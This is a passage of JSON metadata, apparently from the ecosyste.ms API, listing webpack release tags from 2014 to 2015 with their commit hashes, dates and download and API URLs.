22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4